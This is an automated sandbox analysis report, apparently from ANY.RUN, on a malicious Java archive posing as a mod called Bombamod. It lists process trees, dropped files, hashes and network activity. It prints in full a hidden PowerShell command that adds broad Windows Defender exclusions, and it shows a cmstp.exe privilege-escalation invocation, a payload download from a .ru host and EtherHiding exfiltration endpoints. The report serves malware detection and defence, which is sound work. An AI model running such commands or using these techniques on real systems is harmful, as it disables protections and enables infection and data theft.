File name: Bombamod-2.0.0.jar

Full analysis: https://app.any.run/tasks/7f1e5162-acd9-44e7-8a84-0ff9b74db546
Verdict: Malicious activity
Analysis date: March 27, 2026, 16:19:35
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: etherhiding
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5: 77374F817841D27EC1DB845ED4601EDF
SHA1: 3E92A6860BCF6F2D3B6AA168686CBD45ACF1E51D
SHA256: 800446D4E857C1D5D684B365AE14164048FDFE9A2B1FA2E59F352F9EBE6BDD2E
SSDEEP: 12288:3AsiYrvJKBpgGLYhsnS4Vez/bly2oNkOkcs+OoCMMmUMRsYWug:KYrvJKBpgGLYhsnS4Vez/blvoN9kcsUu

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may have been distorted by user actions and is provided as is, for the user's own assessment. ANY.RUN does not guarantee that the content is malicious or safe.
  • MALICIOUS
    • Known privilege escalation attack
      • dllhost.exe (PID: 7116)
    • Run PowerShell with an invisible window
      • powershell.exe (PID: 5524)
    • Adds process to the Windows Defender exclusion list
      • cmd.exe (PID: 3136)
    • Changes Windows Defender settings
      • cmd.exe (PID: 3136)
  • SUSPICIOUS
    • Application launched itself
      • javaw.exe (PID: 1684)
    • Runs shell command (SCRIPT)
      • wscript.exe (PID: 8096)
    • The process executes VB scripts
      • wscript.exe (PID: 8096)
    • Uses cmstp to execute code hidden within an .inf file
      • javaw.exe (PID: 4316)
    • Executing commands from ".cmd" file
      • javaw.exe (PID: 5604)
    • Script adds exclusion process to Windows Defender
      • cmd.exe (PID: 3136)
    • Executable content was dropped or overwritten
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)
    • Adds exclusion path to Windows Defender (POWERSHELL)
      • cmd.exe (PID: 3136)
    • Starts CMD.EXE for commands execution
      • cmd.exe (PID: 3136)
    • Starts POWERSHELL.EXE for commands execution
      • cmd.exe (PID: 3136)
  • INFO
    • Checks supported languages
      • javaw.exe (PID: 4316)
      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 5604)
    • Create files in a temporary directory
      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)
    • Reads Environment values
      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 4316)
      • javaw.exe (PID: 5604)
    • Reads CPU info
      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)
    • Checks transactions between databases Windows and Oracle
      • cmstp.exe (PID: 7936)
    • Disables trace logs
      • dllhost.exe (PID: 7116)
      • cmstp.exe (PID: 7936)
    • Reads the machine GUID from the registry
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)
    • Checks if a key exists in the options dictionary (POWERSHELL)
      • powershell.exe (PID: 5524)
    • Reads the computer name
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)
    • Creates files or folders in the user directory
      • javaw.exe (PID: 4316)
No Malware configuration.

TRiD

.spe | SPSS Extension (61.8)
.jar | Java Archive (29.8)
.zip | ZIP compressed archive (8.2)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2026:03:27 16:16:24
ZipCRC: 0x04e3bcf9
ZipCompressedSize: 450
ZipUncompressedSize: 450
ZipFileName: META-INF/MANIFEST.MF
Total processes: 143
Monitored processes: 11
Malicious processes: 4
Suspicious processes: 2

Behavior graph

Process nodes shown in the graph (image available in the full report): javaw.exe, javaw.exe, slui.exe, cmstp.exe, CMSTPLUA, wscript.exe, javaw.exe, cmd.exe, conhost.exe, powershell.exe, svchost.exe

Process information

Fields per process: PID | CMD | Path | Indicators | Parent process
PID: 1684
CMD: "C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -jar C:\Users\admin\Desktop\Bombamod-2.0.0.jar
Path: C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
Parent process: explorer.exe
User: admin
Company: N/A
Integrity Level: MEDIUM
Description: Java(TM) Platform SE binary
Exit code: 0
Version: 25.0.2.0
PID: 2232
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 3136
CMD: cmd.exe /c C:\Users\admin\AppData\Local\Temp\WinDefConfig.cmd
Path: C:\Windows\System32\cmd.exe
Parent process: javaw.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 3420
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 3580
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 4316
CMD: "C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -jar C:\Users\admin\Desktop\Bombamod-2.0.0.jar --jw
Path: C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
Parent process: javaw.exe
User: admin
Company: N/A
Integrity Level: MEDIUM
Description: Java(TM) Platform SE binary
Exit code: 0
Version: 25.0.2.0
PID: 5524
CMD: powershell -W Hidden -C "Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Microsoft\Tlmtry' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\ChromeDriver' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\ChromeDriver\chromedriver.dll' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Security' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp\' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\Downloads' -EA 0; Add-MpPreference -ExclusionPath 'C:\Windows\Temp' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin' -EA 0; Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'javaw.exe' -EA 0; Add-MpPreference -ExclusionProcess 'java.exe' -EA 0; Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupt.exe' -EA 0; Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupts.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Injector.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupt.exe' -EA 0; Add-MpPreference -ExclusionProcess 'chrome.exe' -EA 0; Add-MpPreference -ExclusionProcess 'brave.exe' -EA 0; Add-MpPreference -ExclusionProcess 'msedge.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Telemetry.exe' -EA 0; Add-MpPreference -ExclusionProcess 'abcfg.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Pjibf.exe' -EA 0; Add-MpPreference -ExclusionProcess 'file2.exe' -EA 0; "
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 5604
CMD: "C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -cp "C:\Users\admin\AppData\Local\Temp\elevator.jar" dev.majanito.Main b64:eyJleGVjdXRpb25FbnZpcm9ubWVudCI6IkRvdWJsZUNsaWNrIiwidXNlcklkIjoiOTcxMmQ3NmItYjEyNi00ZjIzLTgyYjUtODI3YTEwMjJkYWVhIn0=
Path: C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
Parent process: wscript.exe
User: admin
Company: N/A
Integrity Level: HIGH
Description: Java(TM) Platform SE binary
Exit code: 1
Version: 25.0.2.0
PID: 7116
CMD: C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Path: C:\Windows\System32\dllhost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: COM Surrogate
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
PID: 7936
CMD: cmstp.exe /au "C:\Users\admin\AppData\Local\Temp\\nyungfmyod.xdmf"
Path: C:\Windows\System32\cmstp.exe
Parent process: javaw.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile Installer
Exit code: 0
Version: 7.2.19041.1 (WinBuild.160101.0800)
Total events: 12 505
Read events: 12 471
Write events: 34
Delete events: 0

Modification events

PID 3580 slui.exe | Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E | Operation: write | Name: @%SystemRoot%\System32\sppcomapi.dll,-3200 | Value: Software Licensing
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: EnableFileTracing | Value: 0
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: EnableAutoFileTracing | Value: 0
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: EnableConsoleTracing | Value: 0
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: FileTracingMask | Value:
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: ConsoleTracingMask | Value:
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: MaxFileSize | Value: 1048576
PID 7936 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: FileDirectory | Value: %windir%\tracing
PID 7936 cmstp.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections | Operation: write | Name: DesktopShortcut | Value: 0
PID 7116 dllhost.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | Operation: write | Name: SM_AccessoriesName | Value: Accessories
Executable files: 5
Suspicious files: 2
Text files: 8
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4316 | javaw.exe | C:\Users\admin\AppData\Local\Temp\jna-1774628395904\jnidispatch.dll | executable
  MD5: 2D2475F1F026DD54E9F3E787AE4F81DA
  SHA256: 5A7FF949F6D93D86491EB5B26B1CFC60051168A60622650224B89995AC420023
4316 | javaw.exe | C:\Users\admin\AppData\Local\Temp\elevator.jar | text
  MD5: 140B2805EF1B809767937EEE69605033
  SHA256: A84BF90031B08C9B8ABE7C2B55B8A06A8DDD585F1BA5F68E423808CCC5782EA7
4316 | javaw.exe | C:\Users\admin\AppData\Local\Temp\elv.vbs | text
  MD5: 0411D74A70CD2DEC8799818C89E77F39
  SHA256: D9232CA4C4964B9A78F9C1D8030A7328B2F86601F9909D0B5F39A565B0567A3D
5604 | javaw.exe | C:\Users\admin\AppData\Local\Temp\WinDefConfig.cmd | text
  MD5: C925DCFC4CDBDBED3465824646A660FB
  SHA256: 1B5CA4D2B5EB23041DA0F6EFFDC408D50768701D4140A21C9FBD244F9458D720
5604 | javaw.exe | C:\Users\admin\AppData\Local\Temp\lib6242134826451429154.tmp | executable
  MD5: FC78CC5162E5B7996901A34C39986D9E
  SHA256: 6800156D772B2E256A875E47FA6267A266A06C486C7CA5D319ABEF0B0AC4C1E7
5604 | javaw.exe | C:\Users\admin\AppData\Local\Temp\jna-1774628407626\jnidispatch.dll | executable
  MD5: 2D2475F1F026DD54E9F3E787AE4F81DA
  SHA256: 5A7FF949F6D93D86491EB5B26B1CFC60051168A60622650224B89995AC420023
4316 | javaw.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\83aa4cc77f591dfc2374580bbd95f6ba_bb926e54-e3ca-40fd-ae90-2764341e7792 | binary
  MD5: C8366AE350E7019AEFC9D1E6E6A498C6
  SHA256: 11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
4316 | javaw.exe | C:\Users\admin\AppData\Local\Temp\lib11800948593590041916.tmp | executable
  MD5: FC78CC5162E5B7996901A34C39986D9E
  SHA256: 6800156D772B2E256A875E47FA6267A266A06C486C7CA5D319ABEF0B0AC4C1E7
4316 | javaw.exe | C:\Users\admin\AppData\Local\Temp\nyungfmyod.xdmf | text
  MD5: A18FB0BBE3E67074CA6D0134C0B7D5F7
  SHA256: FDCEAFE4DCF9CF6D23B2033824275C08EC73D6B01ADC644416E43ECCA94C89C9
5524 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xaoadr5y.uf3.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 24
TCP/UDP connections: 32
DNS requests: 14
Threats: 9

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5276 | MoUsoCoreWorker.exe | GET | 200 | 184.24.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
6260 | svchost.exe | GET | 200 | 184.24.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
3580 | slui.exe | POST | 500 | 48.192.1.65:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | text | 512 b | whitelisted
5276 | MoUsoCoreWorker.exe | GET | 200 | 23.52.181.212:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted
4316 | javaw.exe | GET | 200 | 185.178.208.129:443 | https://whreceiverrrrrrrrr.ru/files/jar/module | RU | text | 6.69 Mb | unknown
4316 | javaw.exe | POST | 200 | 51.254.59.59:443 | https://eth.api.onfinality.io/public | FR | binary | 934 b | malicious
4316 | javaw.exe | POST | 200 | 51.254.59.59:443 | https://eth.api.onfinality.io/public | FR | binary | 934 b | malicious
5604 | javaw.exe | GET | 200 | 1.1.1.1:443 | https://cloudflare-dns.com/dns-query?name=eth.api.onfinality.io&type=A | AU | text | 287 b | unknown
4316 | javaw.exe | GET | 200 | 1.1.1.1:443 | https://cloudflare-dns.com/dns-query?name=eth.api.onfinality.io&type=A | AU | text | 287 b | unknown
5604 | javaw.exe | GET | 200 | 1.1.1.1:443 | https://cloudflare-dns.com/dns-query?name=whreceiverrrrrrrrr.ru&type=A | AU | binary | 208 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | Not routed | whitelisted
6260 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5276 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
8028 | slui.exe | 48.192.1.65:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
4 | System | 192.168.100.255:138 | Not routed | whitelisted
6260 | svchost.exe | 184.24.77.6:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
5276 | MoUsoCoreWorker.exe | 184.24.77.6:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
6260 | svchost.exe | 23.52.181.212:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
5276 | MoUsoCoreWorker.exe | 23.52.181.212:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
6260 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158, 20.73.194.208, 51.124.78.146 | whitelisted
activation-v2.sls.microsoft.com | 48.192.1.65 | whitelisted
google.com | 142.251.141.78 | whitelisted
crl.microsoft.com | 184.24.77.6, 184.24.77.23, 184.24.77.37, 184.24.77.42, 184.24.77.12, 184.24.77.11, 23.55.110.211, 23.55.110.193 | whitelisted
www.microsoft.com | 23.52.181.212, 88.221.169.152 | whitelisted
eth.llamarpc.com | 172.67.167.200, 104.21.67.22 | malicious
eth.api.onfinality.io | 51.254.59.59 | malicious
whreceiverrrrrrrrr.ru | 185.178.208.129 | malicious
cloudflare-dns.com | 104.16.249.249, 104.16.248.249 | whitelisted
self.events.data.microsoft.com | 20.42.65.94 | whitelisted

Threats

PID | Process | Class | Message
- | - | A Network Trojan was detected | ET MALWARE EtherHiding Exfil M2
- | - | A Network Trojan was detected | ET MALWARE EtherHiding Exfil M2
- | - | Misc activity | INFO [ANY.RUN] DDoS-Guard Hosted Web Content observed
2232 | svchost.exe | Misc activity | INFO [ANY.RUN] Cloudflare DNS-over-HTTPS service requested (cloudflare-dns .com)
4316 | javaw.exe | Misc activity | ET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
- | - | A Network Trojan was detected | ET MALWARE EtherHiding Exfil M2
- | - | A Network Trojan was detected | ET MALWARE EtherHiding Exfil M2
- | - | A Network Trojan was detected | ET MALWARE EtherHiding Exfil M2
- | - | A Network Trojan was detected | ET MALWARE EtherHiding Exfil M2
No debug info